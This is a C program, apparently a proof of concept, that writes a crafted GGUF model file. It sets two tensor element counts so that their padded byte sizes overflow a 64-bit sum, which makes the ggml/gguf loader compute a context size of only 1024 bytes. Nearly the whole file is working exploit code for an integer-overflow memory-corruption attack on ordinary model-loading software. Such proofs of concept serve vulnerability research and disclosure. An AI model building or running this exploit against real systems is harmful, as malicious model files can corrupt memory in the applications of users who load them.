|
#include <inttypes.h> |
|
#include <stdint.h> |
|
#include <stdio.h> |
|
#include <stdlib.h> |
|
#include <string.h> |
|
|
|
#ifndef GGML_MAX_DIMS |
|
# define GGML_MAX_DIMS 4 |
|
#endif |
|
|
|
|
|
|
|
|
|
|
|
typedef enum { |
|
POC_GGML_TYPE_F32 = 0, |
|
POC_GGML_TYPE_F16 = 1, |
|
POC_GGML_TYPE_Q4_0 = 2, |
|
|
|
} poc_ggml_type; |
|
|
|
|
|
size_t poc_ggml_type_size(poc_ggml_type type) { |
|
if (type == POC_GGML_TYPE_F16) { |
|
return 2; |
|
} |
|
if (type == POC_GGML_TYPE_F32) { |
|
return 4; |
|
} |
|
|
|
return 0; |
|
} |
|
|
|
|
|
int poc_ggml_blck_size(poc_ggml_type type) { |
|
|
|
if (type == POC_GGML_TYPE_F16 || type == POC_GGML_TYPE_F32) { |
|
return 1; |
|
} |
|
|
|
return 1; |
|
} |
|
|
|
|
|
|
|
|
|
|
|
|
|
size_t calculate_ggml_nbytes_in_poc(int64_t ne_dim0, poc_ggml_type type) { |
|
if (ne_dim0 < 0) { |
|
|
|
|
|
|
|
return 0; |
|
} |
|
size_t ts = poc_ggml_type_size(type); |
|
int bs = poc_ggml_blck_size(type); |
|
if (bs == 0) { |
|
return 0; |
|
} |
|
|
|
|
|
|
|
uint64_t ne_u = (uint64_t) ne_dim0; |
|
uint64_t num = ne_u * ts; |
|
return num / (uint64_t) bs; |
|
} |
|
|
|
|
|
|
|
struct poc_gguf_tensor_info_header { |
|
uint64_t name_len; |
|
|
|
}; |
|
|
|
struct poc_gguf_tensor_info_meta { |
|
uint32_t n_dims; |
|
int64_t ne[GGML_MAX_DIMS]; |
|
uint32_t type; |
|
uint64_t offset; |
|
}; |
|
|
|
#define NUM_POC_TENSORS 2 |
|
#define ALIGNMENT 32 |
|
|
|
uint64_t POC_GGML_PAD(uint64_t x, uint64_t align) { |
|
return ((x + align - 1) / align) * align; |
|
} |
|
|
|
|
|
#ifndef GGUF_VERSION |
|
# define GGUF_VERSION 3 |
|
#endif |
|
|
|
int main(int ac, char ** av) { |
|
if (ac != 2) { |
|
printf("usage: %s <filename>\n", av[0]); |
|
exit(1); |
|
} |
|
|
|
const char * filename = av[1]; |
|
|
|
uint32_t version = GGUF_VERSION; |
|
uint64_t n_tensors_val = NUM_POC_TENSORS; |
|
uint64_t n_kv_val = 0; |
|
|
|
|
|
|
|
|
|
|
|
|
|
const uint64_t TARGET_CTX_SIZE_AFTER_OVERFLOW = |
|
1024ULL; |
|
|
|
poc_ggml_type type0 = POC_GGML_TYPE_F16; |
|
poc_ggml_type type1 = POC_GGML_TYPE_F16; |
|
size_t ts0 = poc_ggml_type_size(type0); |
|
size_t ts1 = poc_ggml_type_size(type1); |
|
|
|
|
|
uint64_t nbytes0_target = 0xD000000000000000ULL; |
|
|
|
if (nbytes0_target % ts0 != 0) { |
|
nbytes0_target = (nbytes0_target / ts0) * ts0; |
|
} |
|
if (nbytes0_target % ALIGNMENT != 0) { |
|
nbytes0_target = (nbytes0_target / ALIGNMENT) * ALIGNMENT; |
|
} |
|
|
|
int64_t ne0 = nbytes0_target / ts0; |
|
size_t nbytes0 = calculate_ggml_nbytes_in_poc(ne0, type0); |
|
|
|
uint64_t padded_nbytes0 = POC_GGML_PAD(nbytes0, ALIGNMENT); |
|
printf("Target final ctx->size after overflow: 0x%" PRIx64 "\n", TARGET_CTX_SIZE_AFTER_OVERFLOW); |
|
printf("Calculated ne0: %" PRId64 "\n", ne0); |
|
printf("Designed nbytes0: 0x%" PRIx64 ", resulting padded_nbytes0: 0x%" PRIx64 "\n", nbytes0, padded_nbytes0); |
|
|
|
|
|
|
|
uint64_t target_padded_nbytes1 = (0xFFFFFFFFFFFFFFFFULL - padded_nbytes0 + 1ULL) + TARGET_CTX_SIZE_AFTER_OVERFLOW; |
|
|
|
|
|
|
|
|
|
uint64_t nbytes1_target = target_padded_nbytes1; |
|
if (nbytes1_target % ts1 != 0) { |
|
nbytes1_target = (nbytes1_target / ts1) * ts1; |
|
|
|
|
|
} |
|
if (nbytes1_target % ALIGNMENT != 0 && POC_GGML_PAD(nbytes1_target, ALIGNMENT) != target_padded_nbytes1) { |
|
|
|
|
|
|
|
|
|
printf("Warning: nbytes1_target (0x%" PRIx64 ") might not perfectly pad to target_padded_nbytes1 (0x%" PRIx64 |
|
").\n", |
|
nbytes1_target, target_padded_nbytes1); |
|
} |
|
|
|
int64_t ne1 = nbytes1_target / ts1; |
|
if (ne1 <= 0) { |
|
fprintf(stderr, |
|
"Error: Calculated ne1 (%" PRId64 |
|
") is not positive. Adjust nbytes0_target or TARGET_CTX_SIZE_AFTER_OVERFLOW.\n", |
|
ne1); |
|
exit(1); |
|
} |
|
size_t nbytes1 = calculate_ggml_nbytes_in_poc(ne1, type1); |
|
|
|
printf("Calculated ne1: %" PRId64 "\n", ne1); |
|
printf("Designed nbytes1: 0x%" PRIx64 " (aiming for its padded version to be 0x%" PRIx64 ")\n", nbytes1, |
|
target_padded_nbytes1); |
|
|
|
|
|
|
|
|
|
|
|
|
|
FILE * fp = fopen(filename, "wb"); |
|
if (!fp) { |
|
perror("Unable to write out file"); |
|
exit(1); |
|
} |
|
|
|
printf("[+] Writing GGUF header: %s\n", filename); |
|
fwrite("GGUF", 4, 1, fp); |
|
fwrite(&version, sizeof(version), 1, fp); |
|
fwrite(&n_tensors_val, sizeof(n_tensors_val), 1, fp); |
|
fwrite(&n_kv_val, sizeof(n_kv_val), 1, fp); |
|
|
|
uint64_t calculated_offset_for_ggml = 0; |
|
|
|
|
|
char name0_str[] = "tensor_A"; |
|
struct poc_gguf_tensor_info_header th0; |
|
struct poc_gguf_tensor_info_meta tm0; |
|
th0.name_len = strlen(name0_str); |
|
tm0.n_dims = 1; |
|
tm0.ne[0] = ne0; |
|
tm0.type = type0; |
|
tm0.offset = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT); |
|
|
|
fwrite(&th0.name_len, sizeof(th0.name_len), 1, fp); |
|
fwrite(name0_str, th0.name_len, 1, fp); |
|
fwrite(&tm0.n_dims, sizeof(tm0.n_dims), 1, fp); |
|
fwrite(tm0.ne, sizeof(tm0.ne[0]), tm0.n_dims, fp); |
|
fwrite(&tm0.type, sizeof(tm0.type), 1, fp); |
|
fwrite(&tm0.offset, sizeof(tm0.offset), 1, fp); |
|
printf(" - Tensor 0 (name: %s, ne[0]: %" PRId64 ", type: %u, nbytes_calc: 0x%" PRIx64 |
|
", offset_written: 0x%" PRIx64 ")\n", |
|
name0_str, tm0.ne[0], tm0.type, nbytes0, tm0.offset); |
|
|
|
|
|
calculated_offset_for_ggml = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT); |
|
calculated_offset_for_ggml += nbytes0; |
|
printf(" ggml's ctx->size after tensor 0 (before next pad): 0x%" PRIx64 "\n", calculated_offset_for_ggml); |
|
|
|
|
|
char name1_str[] = "tensor_B"; |
|
struct poc_gguf_tensor_info_header th1; |
|
struct poc_gguf_tensor_info_meta tm1; |
|
th1.name_len = strlen(name1_str); |
|
tm1.n_dims = 1; |
|
tm1.ne[0] = ne1; |
|
tm1.type = type1; |
|
tm1.offset = POC_GGML_PAD(calculated_offset_for_ggml, |
|
ALIGNMENT); |
|
|
|
fwrite(&th1.name_len, sizeof(th1.name_len), 1, fp); |
|
fwrite(name1_str, th1.name_len, 1, fp); |
|
fwrite(&tm1.n_dims, sizeof(tm1.n_dims), 1, fp); |
|
fwrite(tm1.ne, sizeof(tm1.ne[0]), tm1.n_dims, fp); |
|
fwrite(&tm1.type, sizeof(tm1.type), 1, fp); |
|
fwrite(&tm1.offset, sizeof(tm1.offset), 1, fp); |
|
printf(" - Tensor 1 (name: %s, ne[0]: %" PRId64 ", type: %u, nbytes_calc: 0x%" PRIx64 |
|
", offset_written: 0x%" PRIx64 ")\n", |
|
name1_str, tm1.ne[0], tm1.type, nbytes1, tm1.offset); |
|
|
|
|
|
uint64_t prev_calc_offset = calculated_offset_for_ggml; |
|
calculated_offset_for_ggml = POC_GGML_PAD(calculated_offset_for_ggml, ALIGNMENT); |
|
calculated_offset_for_ggml += nbytes1; |
|
printf( |
|
" PoC's internal calculated_offset_for_ggml after tensor 1 (before next pad for hypothetical T2): 0x%" PRIx64 |
|
" (prev was 0x%" PRIx64 ", added unpadded nbytes1 0x%" PRIx64 " to a padded sum)\n", |
|
calculated_offset_for_ggml, prev_calc_offset, nbytes1); |
|
if (calculated_offset_for_ggml < POC_GGML_PAD(prev_calc_offset, ALIGNMENT) && |
|
nbytes1 > 0) { |
|
printf(" >>>> UINT64 OVERFLOW DETECTED in PoC's internal calculated_offset_for_ggml sum <<<<\n"); |
|
} |
|
|
|
|
|
uint64_t final_gguf_ctx_size_in_ggml_dot_cpp = POC_GGML_PAD(nbytes0, ALIGNMENT) + POC_GGML_PAD(nbytes1, ALIGNMENT); |
|
printf(" EXPECTED FINAL gguf.cpp ctx->size (sum of padded nbytes): 0x%" PRIx64 "\n", |
|
final_gguf_ctx_size_in_ggml_dot_cpp); |
|
if (final_gguf_ctx_size_in_ggml_dot_cpp == TARGET_CTX_SIZE_AFTER_OVERFLOW) { |
|
printf(" SUCCESS: EXPECTED FINAL gguf.cpp ctx->size matches TARGET_CTX_SIZE_AFTER_OVERFLOW (0x%" PRIx64 |
|
")!\n", |
|
TARGET_CTX_SIZE_AFTER_OVERFLOW); |
|
} else { |
|
printf(" MISMATCH: EXPECTED FINAL gguf.cpp ctx->size (0x%" PRIx64 |
|
") != TARGET_CTX_SIZE_AFTER_OVERFLOW (0x%" PRIx64 ")!\n", |
|
final_gguf_ctx_size_in_ggml_dot_cpp, TARGET_CTX_SIZE_AFTER_OVERFLOW); |
|
} |
|
|
|
|
|
|
|
long current_pos = ftell(fp); |
|
long padded_pos = POC_GGML_PAD(current_pos, ALIGNMENT); |
|
if (padded_pos > current_pos) { |
|
char pad_bytes[ALIGNMENT] = { 0 }; |
|
printf(" Padding file from %ld to %ld to align data section.\n", current_pos, padded_pos); |
|
fwrite(pad_bytes, 1, padded_pos - current_pos, fp); |
|
} |
|
|
|
char dummy_data_padding[TARGET_CTX_SIZE_AFTER_OVERFLOW]; |
|
|
|
|
|
memset(dummy_data_padding, 0xAA, sizeof(dummy_data_padding)); |
|
|
|
|
|
|
|
|
|
|
|
|
|
size_t num_elements_to_fill_for_tensor_a = 100; |
|
if (num_elements_to_fill_for_tensor_a * sizeof(float) > TARGET_CTX_SIZE_AFTER_OVERFLOW) { |
|
num_elements_to_fill_for_tensor_a = TARGET_CTX_SIZE_AFTER_OVERFLOW / sizeof(float); |
|
} |
|
|
|
float tensor_a_expected_value = 100.0f; |
|
for (size_t k = 0; k < num_elements_to_fill_for_tensor_a; ++k) { |
|
if ((k + 1) * sizeof(float) <= sizeof(dummy_data_padding)) { |
|
memcpy(&dummy_data_padding[k * sizeof(float)], &tensor_a_expected_value, sizeof(float)); |
|
} else { |
|
break; |
|
} |
|
} |
|
printf(" Filled the first %zu float elements of dummy_data_padding with %f for tensor_A.\n", |
|
num_elements_to_fill_for_tensor_a, tensor_a_expected_value); |
|
|
|
fwrite(dummy_data_padding, 1, sizeof(dummy_data_padding), fp); |
|
|
|
fclose(fp); |
|
printf("[+] Finished writing PoC GGUF file.\n"); |
|
return 0; |
|
} |
|
|